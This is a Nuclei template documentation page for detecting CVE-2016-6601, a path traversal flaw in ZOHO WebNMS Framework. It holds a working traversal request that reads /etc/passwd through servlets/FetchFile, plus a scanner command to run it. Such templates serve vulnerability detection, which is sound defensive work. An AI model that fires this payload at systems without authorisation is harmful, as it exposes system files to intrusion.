Skip to content
Nuclei Templates

ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion

ID: CVE-2016-6601

Severity: high

Author: 0x_Akoko

Tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp

Description

Section titled “Description”

ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.

YAML Source

Section titled “YAML Source”
id: CVE-2016-6601


info:
  name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
  remediation: |
    Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.
  reference:
    - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
    - https://www.exploit-db.com/exploits/40229/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
    - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure
    - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-6601
    cwe-id: CWE-22
    epss-score: 0.97504
    epss-percentile: 0.99983
    cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: webnms_framework
  tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp


http:
  - method: GET
    path:
      - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"


      - type: status
        status:
          - 200
# digest: 490a004630440220582c7431db509cba491759497b59639456609f3b94ea8b25f72f50c24246f46202200fdb025cf36c32791a7fd2c917f1d82826f1a20e4b29fa0a375a41ef56166334:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-6601.yaml"

View on Github